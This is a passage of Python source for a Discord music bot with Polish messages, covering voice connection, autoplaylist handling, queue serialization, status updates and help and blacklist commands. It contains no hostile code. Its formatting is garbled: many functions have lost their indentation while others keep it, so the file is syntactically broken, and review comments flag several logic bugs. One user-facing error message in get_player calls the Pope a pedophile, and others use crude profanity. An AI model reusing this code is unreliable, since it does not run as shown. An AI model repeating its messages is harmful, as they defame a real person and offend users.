                log.info("Found resumable voice channel {0.server.name}/{0.name}".format(server.me.voice_channel))
                channel_map[server] = server.me.voice_channel
            if autosummon:
                owner = self._get_owner(server=server, voice=True)
                if owner:
                    log.info("Found owner in \"{}\"".format(owner.voice_channel.name))
                    channel_map[server] = owner.voice_channel

        for server, channel in channel_map.items():
            if server in joined_servers:
                log.info("Already joined a channel in \"{}\", skipping".format(server.name))
                continue
            if channel and channel.type == discord.ChannelType.voice:
                log.info("Attempting to join {0.server.name}/{0.name}".format(channel))
                chperms = channel.permissions_for(server.me)
                if not chperms.connect:
                    log.info("Cannot join channel \"{}\", no permission.".format(channel.name))
                    continue
                elif not chperms.speak:
                    log.info("Will not join channel \"{}\", no permission to speak.".format(channel.name))
                    continue
                try:
                    player = await self.get_player(channel, create=True, deserialize=self.config.persistent_queue)
                    joined_servers.add(server)
                    log.info("Joined {0.server.name}/{0.name}".format(channel))
                    if player.is_stopped:
                        player.play()
                    # Kick off the autoplaylist when the restored queue is empty.
                    if self.config.auto_playlist and not player.playlist.entries:
                        await self.on_player_finished_playing(player)
                    if self.config.auto_pause:
                        player.once('play', lambda player, **_: _autopause(player))
                except Exception:
                    log.debug("Error joining {0.server.name}/{0.name}".format(channel), exc_info=True)
                    log.error("Failed to join {0.server.name}/{0.name}".format(channel))
            elif channel:
                log.warning("Not joining {0.server.name}/{0.name}, that's a text channel.".format(channel))
            else:
                log.warning("Invalid channel thing: {}".format(channel))
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message, quiet=True)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
async def _cache_app_info(self, *, update=False):
if not self.cached_app_info and not update and self.user.bot:
log.debug("Caching app info")
self.cached_app_info = await self.application_info()
return self.cached_app_info
    async def remove_from_autoplaylist(self, song_url:str, *, ex:Exception=None, delete_from_ap=False):
        """Drop a song from the in-memory autoplaylist, logging why it was removed.

        Args:
            song_url: url to remove; a no-op if it is not in the autoplaylist.
            ex: the exception that made the song unplayable (recorded in the
                removed-songs file for later inspection).
            delete_from_ap: when True, also rewrite the autoplaylist file on disk.
        """
        if song_url not in self.autoplaylist:
            log.debug("URL \"{}\" not in autoplaylist, ignoring".format(song_url))
            return

        async with self.aiolocks[_func_()]:
            self.autoplaylist.remove(song_url)
            log.info("Removing unplayable song from autoplaylist: %s" % song_url)

            # Append an audit entry to the removed-songs file.
            with open(self.config.auto_playlist_removed_file, 'a', encoding='utf8') as f:
                f.write(
                    '# Entry removed {ctime}\n'
                    '# Reason: {ex}\n'
                    '{url}\n\n{sep}\n\n'.format(
                        ctime=time.ctime(),
                        ex=str(ex).replace('\n', '\n#' + ' ' * 10),  # 10 spaces to line up with # Reason:
                        url=song_url,
                        sep='#' * 32
                    ))

            if delete_from_ap:
                log.info("Updating autoplaylist")
                write_file(self.config.auto_playlist_file, self.autoplaylist)
    @ensure_appinfo
    async def generate_invite_link(self, *, permissions=discord.Permissions(70380544), server=None):
        """Build an OAuth2 invite URL for the bot (requires cached app info)."""
        return discord.utils.oauth_url(self.cached_app_info.id, permissions=permissions, server=server)
    async def join_voice_channel(self, channel):
        """Connect to a voice channel, driving the gateway handshake manually.

        Reimplements discord.Client.join_voice_channel with explicit 15s
        timeouts so a stuck handshake cannot hang forever.
        """
        if isinstance(channel, discord.Object):
            channel = self.get_channel(channel.id)
        if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
            raise discord.InvalidArgument('Channel passed must be a voice channel')
        server = channel.server
        if self.is_voice_connected(server):
            raise discord.ClientException('Already connected to a voice channel in this server')

        def session_id_found(data):
            # Match the VOICE_STATE_UPDATE for this bot on this server.
            user_id = data.get('user_id')
            guild_id = data.get('guild_id')
            return user_id == self.user.id and guild_id == server.id

        log.voicedebug("(%s) creating futures", _func_())
        # register the futures for waiting
        session_id_future = self.ws.wait_for('VOICE_STATE_UPDATE', session_id_found)
        voice_data_future = self.ws.wait_for('VOICE_SERVER_UPDATE', lambda d: d.get('guild_id') == server.id)

        # "join" the voice channel
        log.voicedebug("(%s) setting voice state", _func_())
        await self.ws.voice_state(server.id, channel.id)

        log.voicedebug("(%s) waiting for session id", _func_())
        session_id_data = await asyncio.wait_for(session_id_future, timeout=15, loop=self.loop)

        # sometimes it gets stuck on this step. Jake said to wait indefinitely. To hell with that.
        log.voicedebug("(%s) waiting for voice data", _func_())
        data = await asyncio.wait_for(voice_data_future, timeout=15, loop=self.loop)

        kwargs = {
            'user': self.user,
            'channel': channel,
            'data': data,
            'loop': self.loop,
            'session_id': session_id_data.get('session_id'),
            'main_ws': self.ws
        }
        voice = discord.VoiceClient(**kwargs)
        try:
            log.voicedebug("(%s) connecting...", _func_())
            with aiohttp.Timeout(15):
                await voice.connect()
        except asyncio.TimeoutError as e:
            # Connection failed within the timeout: tidy up and re-raise.
            log.voicedebug("(%s) connection failed, disconnecting", _func_())
            try:
                await voice.disconnect()
            except:
                pass
            raise e

        log.voicedebug("(%s) connection successful", _func_())

        self.connection._add_voice_client(server.id, voice)
        return voice
    async def get_voice_client(self, channel: discord.Channel):
        """Return the server's voice client, connecting (with retries) if needed.

        Tries up to 5 connection attempts; if all fail the bot restarts itself.
        """
        if isinstance(channel, discord.Object):
            channel = self.get_channel(channel.id)
        if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
            raise AttributeError('Channel passed must be a voice channel')

        async with self.aiolocks[_func_() + ':' + channel.server.id]:
            if self.is_voice_connected(channel.server):
                return self.voice_client_in(channel.server)

            vc = None
            t0 = t1 = 0
            tries = 5

            for attempt in range(1, tries+1):
                log.debug("Connection attempt {} to {}".format(attempt, channel.name))
                t0 = time.time()
                try:
                    vc = await self.join_voice_channel(channel)
                    t1 = time.time()
                    break
                except asyncio.TimeoutError:
                    log.warning("Failed to connect, retrying ({}/{})".format(attempt, tries))
                    # TODO: figure out if I need this or not
                    # try:
                    #     await self.ws.voice_state(channel.server.id, None)
                    # except:
                    #     pass
                except:
                    log.exception("Unknown error attempting to connect to voice")
                await asyncio.sleep(0.5)

            if not vc:
                log.critical("Voice client is unable to connect, restarting...")
                await self.restart()
                # NOTE(review): execution continues past restart() with vc still
                # None, so the attribute access below would fail -- confirm that
                # restart() is expected to unwind before reaching this point.

            log.debug("Connected in {:0.1f}s".format(t1-t0))
            log.info("Connected to {}/{}".format(channel.server, channel))
            vc.ws._keep_alive.name = 'VoiceClient Keepalive'
            return vc
    async def reconnect_voice_client(self, server, *, sleep=0.1, channel=None):
        """Tear down and re-establish a server's voice connection.

        Pauses the player (if it was playing) around the reconnect and resumes
        it afterwards.  When *channel* is given, reconnects to that channel
        instead of the previous one.
        """
        log.debug("Reconnecting voice client on \"{}\"{}".format(
            server, ' to "{}"'.format(channel.name) if channel else ''))

        async with self.aiolocks[_func_() + ':' + server.id]:
            vc = self.voice_client_in(server)
            # Nothing to do without an existing client or a target channel.
            if not (vc or channel):
                return

            _paused = False
            player = self.get_player_in(server)
            if player and player.is_playing:
                log.voicedebug("(%s) Pausing", _func_())
                player.pause()
                _paused = True

            log.voicedebug("(%s) Disconnecting", _func_())
            try:
                await vc.disconnect()
            except:
                pass

            if sleep:
                log.voicedebug("(%s) Sleeping for %s", _func_(), sleep)
                await asyncio.sleep(sleep)

            if player:
                log.voicedebug("(%s) Getting voice client", _func_())
                if not channel:
                    new_vc = await self.get_voice_client(vc.channel)
                else:
                    new_vc = await self.get_voice_client(channel)

                log.voicedebug("(%s) Swapping voice client", _func_())
                await player.reload_voice(new_vc)

                if player.is_paused and _paused:
                    log.voicedebug("Resuming")
                    player.resume()

        log.debug("Reconnected voice client on \"{}\"{}".format(
            server, ' to "{}"'.format(channel.name) if channel else ''))
async def disconnect_voice_client(self, server):
vc = self.voice_client_in(server)
if not vc:
return
if server.id in self.players:
self.players.pop(server.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.server)
async def set_voice_state(self, vchannel, *, mute=False, deaf=False):
if isinstance(vchannel, discord.Object):
vchannel = self.get_channel(vchannel.id)
if getattr(vchannel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
await self.ws.voice_state(vchannel.server.id, vchannel.id, mute, deaf)
# I hope I don't have to set the channel here
# instead of waiting for the event to update it
    def get_player_in(self, server: discord.Server) -> MusicPlayer:
        """Return the server's MusicPlayer, or None if it has none."""
        return self.players.get(server.id)
    async def get_player(self, channel, create=False, *, deserialize=False) -> MusicPlayer:
        """Return (or create) the MusicPlayer for the channel's server.

        Args:
            channel: voice channel used to (re)connect the voice client.
            create: when False, raise CommandError if no player exists yet.
            deserialize: when True, try to restore a previously serialized queue.
        """
        server = channel.server

        async with self.aiolocks[_func_() + ':' + server.id]:
            if deserialize:
                voice_client = await self.get_voice_client(channel)
                player = await self.deserialize_queue(server, voice_client)

                if player:
                    log.debug("Created player via deserialization for server %s with %s entries", server.id, len(player.playlist))
                    # Since deserializing only happens when the bot starts, I should never need to reconnect
                    return self._init_player(player, server=server)

            if server.id not in self.players:
                if not create:
                    raise exceptions.CommandError(
                        'Papież nie jest na kanale głosowym.. '
                        'Zawołaj pedofila używając %sdj aby wezwać najlepszego Didżeja w Watykanie!' % self.config.command_prefix)

                voice_client = await self.get_voice_client(channel)

                playlist = Playlist(self)
                player = MusicPlayer(self, voice_client, playlist)
                self._init_player(player, server=server)

            # Reconnect if the stored voice client went stale.
            async with self.aiolocks[self.reconnect_voice_client.__name__ + ':' + server.id]:
                if self.players[server.id].voice_client not in self.voice_clients:
                    log.debug("Reconnect required for voice client in {}".format(server.name))
                    await self.reconnect_voice_client(server, channel=channel)

        return self.players[server.id]
    def _init_player(self, player, *, server=None):
        """Wire player events to their handlers and register the player.

        NOTE(review): the first three event names are Polish ('graj',
        'odpauzuj', 'pauza') while the handler names suggest English events
        ('play', 'resume', 'pause'); confirm the MusicPlayer actually emits
        these translated names, otherwise those handlers never fire.
        """
        player = player.on('graj', self.on_player_play) \
            .on('odpauzuj', self.on_player_resume) \
            .on('pauza', self.on_player_pause) \
            .on('stop', self.on_player_stop) \
            .on('finished-playing', self.on_player_finished_playing) \
            .on('entry-added', self.on_player_entry_added) \
            .on('error', self.on_player_error)

        player.skip_state = SkipState()

        if server:
            self.players[server.id] = player

        return player
    async def on_player_play(self, player, entry):
        """Handle a new entry starting: update presence and announce the song."""
        await self.update_now_playing_status(entry)
        player.skip_state.reset()

        # This is the one event where its ok to serialize autoplaylist entries
        await self.serialize_queue(player.voice_client.channel.server)

        # User-requested entries carry the requesting channel/author in meta
        # (Polish keys 'kanał'/'autor'); autoplaylist entries do not.
        channel = entry.meta.get('kanał', None)
        author = entry.meta.get('autor', None)

        if channel and author:
            last_np_msg = self.server_specific_data[channel.server]['last_np_msg']
            if last_np_msg and last_np_msg.channel == channel:

                # Drop the old now-playing message if anything was posted after it.
                async for lmsg in self.logs_from(channel, limit=1):
                    if lmsg != last_np_msg and last_np_msg:
                        await self.safe_delete_message(last_np_msg)
                        self.server_specific_data[channel.server]['last_np_msg'] = None
                    break  # This is probably redundant

            if self.config.now_playing_mentions:
                newmsg = '%s - twoja piosenka **%s** jest grana na kanale %s!' % (
                    entry.meta['autor'].mention, entry.title, player.voice_client.channel.name)
            else:
                newmsg = 'Napierdalamy na %s: **%s**' % (
                    player.voice_client.channel.name, entry.title)

            if self.server_specific_data[channel.server]['last_np_msg']:
                self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_edit_message(last_np_msg, newmsg, send_if_fail=True)
            else:
                self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_send_message(channel, newmsg)
# TODO: Check channel voice state?
    async def on_player_resume(self, player, entry, **_):
        """Restore the 'now playing' presence when playback resumes."""
        await self.update_now_playing_status(entry)
    async def on_player_pause(self, player, entry, **_):
        """Show the paused marker in the bot's presence."""
        await self.update_now_playing_status(entry, True)
        # await self.serialize_queue(player.voice_client.channel.server)
    async def on_player_stop(self, player, **_):
        """Clear the bot's presence when playback stops."""
        await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
if not player.playlist.entries and not player.current_entry and self.config.auto_playlist:
if not self.autoplaylist_session:
log.info("Autoplaylista pusta,napierdalam własną....")
self.autoplaylist_session = self.autoplaylist[:]
while self.autoplaylist_session:
random.shuffle(self.autoplaylist_session)
song_url = random.choice(self.autoplaylist_session)
self.autoplaylist_session.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except downloader.youtube_dl.utils.DownloadError as e:
if 'Youtube powiedział:' in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Błąd na youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
await self.remove_from_autoplaylist(song_url, ex=e, delete_from_ap=True)
continue
except Exception as e:
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
log.exception()
self.autoplaylist.remove(song_url)
continue
if info.get('entries', None): # or .get('_type', '') == 'playlist'
log.debug("Ta playlista jest nie fajna,przewijam.")
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
try:
await player.playlist.add_entry(song_url, channel=None, author=None)
except exceptions.ExtractionError as e:
log.error("Błąd w trakcie przesyłania nutki z autoplaylisty: {}".format(e))
log.debug('', exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("Wyłączam autoplayliste.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_entry_added(self, player, playlist, entry, **_):
if entry.meta.get('autor') and entry.meta.get('kanał'):
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_error(self, player, entry, ex, **_):
if 'kanał' in entry.meta:
await self.safe_send_message(
entry.meta['kanał'],
"```\nError from FFmpeg:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
    async def update_now_playing_status(self, entry=None, is_paused=False):
        """Set the bot's 'playing' presence from the current entry.

        A configured status_message always wins.  Otherwise, bots with more
        than one active player show a server count, and a single active player
        shows the current song title (with a pause marker when paused).
        """
        game = None

        if not self.config.status_message:
            if self.user.bot:
                activeplayers = sum(1 for p in self.players.values() if p.is_playing)
                if activeplayers > 1:
                    game = discord.Game(type=0, name="music on %s servers" % activeplayers)
                    entry = None
                elif activeplayers == 1:
                    player = discord.utils.get(self.players.values(), is_playing=True)
                    entry = player.current_entry

            if entry:
                prefix = u'\u275A\u275A ' if is_paused else ''  # double vertical bar = paused
                name = u'{}{}'.format(prefix, entry.title)[:128]  # 128-char presence limit
                game = discord.Game(type=0, name=name)
        else:
            game = discord.Game(type=0, name=self.config.status_message.strip()[:128])

        # Only hit the API when the presence actually changed.
        async with self.aiolocks[_func_()]:
            if game != self.last_status:
                await self.change_presence(game=game)
                self.last_status = game
    async def update_now_playing_message(self, server, message, *, channel=None):
        """Update (edit, move, or delete) the server's 'now playing' message.

        message=None deletes the previous message; otherwise the previous one
        is edited in place, or resent when newer messages have arrived.
        """
        lnp = self.server_specific_data[server]['last_np_msg']
        m = None

        if message is None and lnp:
            await self.safe_delete_message(lnp, quiet=True)

        elif lnp:  # If there was a previous lp message
            oldchannel = lnp.channel

            # NOTE(review): this comparison is always True since oldchannel was
            # just read from lnp.channel, and the logs_from() call below uses
            # the *channel* argument, which may be None here -- confirm intended.
            if lnp.channel == oldchannel:  # If we have a channel to update it in
                async for lmsg in self.logs_from(channel, limit=1):
                    if lmsg != lnp and lnp:  # If we need to resend it
                        await self.safe_delete_message(lnp, quiet=True)
                        m = await self.safe_send_message(channel, message, quiet=True)
                    else:
                        m = await self.safe_edit_message(lnp, message, send_if_fail=True, quiet=False)

            elif channel:  # If we have a new channel to send it to
                await self.safe_delete_message(lnp, quiet=True)
                m = await self.safe_send_message(channel, message, quiet=True)

            else:  # we just resend it in the old channel
                await self.safe_delete_message(lnp, quiet=True)
                m = await self.safe_send_message(oldchannel, message, quiet=True)

        elif channel:  # No previous message
            m = await self.safe_send_message(channel, message, quiet=True)

        self.server_specific_data[server]['last_np_msg'] = m
async def serialize_queue(self, server, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(server)
if not player:
return
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization'+':'+server.id]:
log.debug("Serializing queue for %s", server.id)
with open(dir, 'w', encoding='utf8') as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.servers]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(self, server, voice_client, playlist=None, *, dir=None) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization' + ':' + server.id]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", server.id)
with open(dir, 'r', encoding='utf8') as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
    @ensure_appinfo
    async def _on_ready_sanity_checks(self):
        """Run all post-login sanity checks (folders, permissions, configs)."""
        # Ensure folders exist
        await self._scheck_ensure_env()

        # Server permissions check
        await self._scheck_server_permissions()

        # playlists in autoplaylist
        await self._scheck_autoplaylist()

        # config/permissions async validate?
        await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for server in self.servers:
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
with open('data/server_names.txt', 'w', encoding='utf8') as f:
for server in sorted(self.servers, key=lambda s:int(s.id)):
f.write('{:<22} {}\n'.format(server.id, server.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
    async def _scheck_server_permissions(self):
        """Placeholder: audit per-server permissions (not implemented yet)."""
        log.debug("Checking server permissions")
        pass  # TODO
    async def _scheck_autoplaylist(self):
        """Placeholder: audit the autoplaylist contents (not implemented yet)."""
        log.debug("Auditing autoplaylist")
        pass  # TODO
    async def _scheck_configs(self):
        """Run the async validation hooks on config and permissions."""
        log.debug("Validating config")
        await self.config.async_validate(self)

        log.debug("Validating permissions config")
        await self.permissions.async_validate(self)
#######################################################################################################################
    async def safe_send_message(self, dest, content, **kwargs):
        """Send a message, swallowing (and logging) common API errors.

        Keyword args:
            tts: send as text-to-speech.
            quiet: log failures at DEBUG instead of WARNING.
            expire_in: seconds after which the sent message is deleted (0 = keep).
            allow_none: permit sending when content is None.
            also_delete: another Message to schedule for deletion as well.

        Returns the sent Message, or None on failure.
        """
        tts = kwargs.pop('tts', False)
        quiet = kwargs.pop('quiet', False)
        expire_in = kwargs.pop('expire_in', 0)
        allow_none = kwargs.pop('allow_none', True)
        also_delete = kwargs.pop('also_delete', None)

        msg = None
        lfunc = log.debug if quiet else log.warning

        try:
            if content is not None or allow_none:
                msg = await self.send_message(dest, content, tts=tts)
        except discord.Forbidden:
            lfunc("Cannot send message to \"%s\", no permission", dest.name)
        except discord.NotFound:
            lfunc("Cannot send message to \"%s\", invalid channel?", dest.name)
        except discord.HTTPException:
            if len(content) > DISCORD_MSG_CHAR_LIMIT:
                lfunc("WIADOMOŚĆ JEST ZA DUŻA(%s)", DISCORD_MSG_CHAR_LIMIT)
            else:
                lfunc("Błąd w trakcie wysyłania wiadomośći")
                log.noise("Got HTTPException trying to send message to %s: %s", dest, content)
        finally:
            if msg and expire_in:
                asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))

            # NOTE(review): also_delete uses expire_in even when it is 0,
            # deleting the other message immediately -- confirm intended.
            if also_delete and isinstance(also_delete, discord.Message):
                asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))

        return msg
async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.delete_message(message)
except discord.Forbidden:
lfunc("Cannot delete message \"{}\", no permission".format(message.clean_content))
except discord.NotFound:
lfunc("Cannot delete message \"{}\", message not found".format(message.clean_content))
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.edit_message(message, new)
except discord.NotFound:
lfunc("Cannot edit message \"{}\", message not found".format(message.clean_content))
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
    async def send_typing(self, destination):
        """Send a typing indicator, ignoring missing permissions."""
        try:
            return await super().send_typing(destination)
        except discord.Forbidden:
            log.warning("Could not send typing to {}, no permission".format(destination))
async def edit_profile(self, **fields):
if self.user.bot:
return await super().edit_profile(**fields)
else:
return await super().edit_profile(self.config._password,**fields)
    async def restart(self):
        """Flag a restart and log out; run() re-raises the signal on exit."""
        self.exit_signal = exceptions.RestartSignal()
        await self.logout()
    def restart_threadsafe(self):
        """Schedule restart() on the bot's event loop from another thread."""
        asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
    def _cleanup(self):
        """Best-effort shutdown: log out, then cancel and drain pending tasks.

        The bare excepts are deliberate: cleanup must never raise, and the
        cancelled gather surfaces CancelledError (a BaseException) here.
        """
        try:
            self.loop.run_until_complete(self.logout())
        except: pass

        pending = asyncio.Task.all_tasks()
        gathered = asyncio.gather(*pending)
        try:
            gathered.cancel()
            self.loop.run_until_complete(gathered)
            # Retrieve the exception so it is not logged as unhandled.
            gathered.exception()
        except: pass
    # noinspection PyMethodOverriding
    def run(self):
        """Run the bot's event loop until logout, translating login failures.

        After cleanup, re-raises any stored exit signal (restart/terminate)
        so the launcher can act on it.
        """
        try:
            self.loop.run_until_complete(self.start(*self.config.auth))
        except discord.errors.LoginFailure:
            # Add if token, else
            raise exceptions.HelpfulError(
                "Bot cannot login, bad credentials.",
                "Fix your %s in the options file. "
                "Remember that each field should be on their own line."
                % ['shit', 'Token', 'Email/Password', 'Credentials'][len(self.config.auth)]
            ) # ^^^^ In theory self.config.auth should never have no items
        finally:
            try:
                self._cleanup()
            except Exception:
                log.error("Error in cleanup", exc_info=True)

            self.loop.close()
            if self.exit_signal:
                raise self.exit_signal
    async def logout(self):
        """Disconnect all voice clients before logging out of discord."""
        await self.disconnect_all_voice_clients()
        return await super().logout()
    async def on_error(self, event, *args, **kwargs):
        """Global event error handler: exit on fatal/Signal errors, log the rest."""
        ex_type, ex, stack = sys.exc_info()

        if ex_type == exceptions.HelpfulError:
            log.error("Exception in {}:\n{}".format(event, ex.message))
            await asyncio.sleep(2)  # don't ask
            await self.logout()

        elif issubclass(ex_type, exceptions.Signal):
            # NOTE(review): this stores the Signal *class*, not an instance;
            # run() later raises it (raising a class instantiates it) --
            # confirm that matches how exit_signal is set elsewhere.
            self.exit_signal = ex_type
            await self.logout()

        else:
            log.error("Exception in {}".format(event), exc_info=True)
    async def on_resumed(self):
        """Log when the gateway session is successfully resumed."""
        log.info("\nReconnected to discord.\n")
    async def on_ready(self):
        """Post-login setup: sanity checks, startup report, channel validation,
        presence update, and autojoining voice channels.

        Guarded by init_ok so duplicate READY events (failed resumes) are
        ignored after the first successful run.
        """
        # Drop any no-newline progress handlers the login sequence installed.
        dlogger = logging.getLogger('discord')
        for h in dlogger.handlers:
            if getattr(h, 'terminator', None) == '':
                dlogger.removeHandler(h)
                print()

        log.debug("Connection established, ready to go.")

        self.ws._keep_alive.name = 'Gateway Keepalive'

        if self.init_ok:
            log.debug("Received additional READY event, may have failed to resume")
            return

        await self._on_ready_sanity_checks()
        print()

        log.info('Connected to Discord!')

        self.init_ok = True

        ################################

        log.info("Bot: {0}/{1}#{2}{3}".format(
            self.user.id,
            self.user.name,
            self.user.discriminator,
            ' [BOT]' if self.user.bot else ' [Userbot]'
        ))

        owner = self._get_owner(voice=True) or self._get_owner()
        if owner and self.servers:
            log.info("Owner: {0}/{1}#{2}\n".format(
                owner.id,
                owner.name,
                owner.discriminator
            ))

            log.info('Server List:')
            [log.info(' - ' + s.name) for s in self.servers]

        elif self.servers:
            log.warning("Owner could not be found on any server (id: %s)\n" % self.config.owner_id)

            log.info('Server List:')
            [log.info(' - ' + s.name) for s in self.servers]

        else:
            log.warning("Owner unknown, bot is not on any servers.")
            if self.user.bot:
                log.warning(
                    "To make the bot join a server, paste this link in your browser. \n"
                    "Note: You should be logged into your main account and have \n"
                    "manage server permissions on the server you want the bot to join.\n"
                    " " + await self.generate_invite_link()
                )

        print(flush=True)

        # Validate bound text channels (voice channels are rejected).
        if self.config.bound_channels:
            chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
            chlist.discard(None)

            invalids = set()
            invalids.update(c for c in chlist if c.type == discord.ChannelType.voice)

            chlist.difference_update(invalids)
            self.config.bound_channels.difference_update(invalids)

            if chlist:
                log.info("Bound to text channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
            else:
                print("Not bound to any text channels")

            if invalids and self.config.debug_mode:
                print(flush=True)
                log.info("Not binding to voice channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]

            print(flush=True)

        else:
            log.info("Not bound to any text channels")

        # Validate autojoin voice channels (text channels are rejected).
        if self.config.autojoin_channels:
            chlist = set(self.get_channel(i) for i in self.config.autojoin_channels if i)
            chlist.discard(None)

            invalids = set()
            invalids.update(c for c in chlist if c.type == discord.ChannelType.text)

            chlist.difference_update(invalids)
            self.config.autojoin_channels.difference_update(invalids)

            if chlist:
                log.info("Autojoining voice chanels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
            else:
                log.info("Not autojoining any voice channels")

            if invalids and self.config.debug_mode:
                print(flush=True)
                log.info("Cannot autojoin text channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]

            autojoin_channels = chlist

        else:
            log.info("Not autojoining any voice channels")
            autojoin_channels = set()

        # Startup options report.
        print(flush=True)
        log.info("Options:")

        log.info(" Command prefix: " + self.config.command_prefix)
        log.info(" Default volume: {}%".format(int(self.config.default_volume * 100)))
        log.info(" Skip threshold: {} votes or {}%".format(
            self.config.skips_required, fixg(self.config.skip_ratio_required * 100)))
        log.info(" Now Playing @mentions: " + ['Disabled', 'Enabled'][self.config.now_playing_mentions])
        log.info(" Auto-Summon: " + ['Disabled', 'Enabled'][self.config.auto_summon])
        log.info(" Auto-Playlist: " + ['Disabled', 'Enabled'][self.config.auto_playlist])
        log.info(" Auto-Pause: " + ['Disabled', 'Enabled'][self.config.auto_pause])
        log.info(" Delete Messages: " + ['Disabled', 'Enabled'][self.config.delete_messages])
        if self.config.delete_messages:
            log.info(" Delete Invoking: " + ['Disabled', 'Enabled'][self.config.delete_invoking])
        log.info(" Debug Mode: " + ['Disabled', 'Enabled'][self.config.debug_mode])
        log.info(" Downloaded songs will be " + ['deleted', 'saved'][self.config.save_videos])
        if self.config.status_message:
            log.info(" Status message: " + self.config.status_message)
        print(flush=True)

        await self.update_now_playing_status()

        # maybe option to leave the ownerid blank and generate a random command for the owner to use
        # wait_for_message is pretty neato

        await self._join_startup_channels(autojoin_channels, autosummon=self.config.auto_summon)

        # t-t-th-th-that's all folks!
async def cmd_help(self, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
if command:
cmd = getattr(self, 'cmd_' + command, None)
if cmd and not hasattr(cmd, 'dev_cmd'):
return Response(
"```\n{}```".format(
dedent(cmd.__doc__)
).format(command_prefix=self.config.command_prefix),
delete_after=60
)
else:
return Response("Nie ma takiej komendy", delete_after=10)
else:
helpmsg = "**Dostępne Komendy**\n```"
commands = []
for att in dir(self):
if att.startswith('cmd_') and att != 'cmd_help' and not hasattr(getattr(self, att), 'dev_cmd'):
command_name = att.replace('cmd_', '').lower()
commands.append("{}{}".format(self.config.command_prefix, command_name))
helpmsg += ", ".join(commands)
helpmsg += "```\n<>"
helpmsg += "Możesz też uzyc `{}help x` aby dowiedzieć paru rzeczy się o poszczególnych komendach.".format(self.config.command_prefix)
return Response(helpmsg, reply=True, delete_after=60)
    async def cmd_blacklist(self, message, user_mentions, option, something):
        """
        Usage:
            {command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
        Add or remove users to the blacklist.
        Blacklisted users are forbidden from using bot commands.
        """
        # NOTE(review): the 'something' parameter is never used -- presumably
        # required by the command dispatcher's signature parsing; confirm.
        if not user_mentions:
            raise exceptions.CommandError("No users listed.", expire_in=20)

        if option not in ['+', '-', 'add', 'remove']:
            raise exceptions.CommandError(
                'Invalid option "%s" specified, use +, -, add, or remove' % option, expire_in=20
            )

        # The owner can never be blacklisted.
        # NOTE(review): this uses print() while everything else logs; confirm.
        for user in user_mentions.copy():
            if user.id == self.config.owner_id:
                print("[Commands:Blacklist] The owner cannot be blacklisted.")
                user_mentions.remove(user)

        old_len = len(self.blacklist)

        if option in ['+', 'add']:
            self.blacklist.update(user.id for user in user_mentions)
            write_file(self.config.blacklist_file, self.blacklist)
            return Response(
                '%s users have been added to the blacklist' % (len(self.blacklist) - old_len),
                reply=True, delete_after=10
            )
        else:
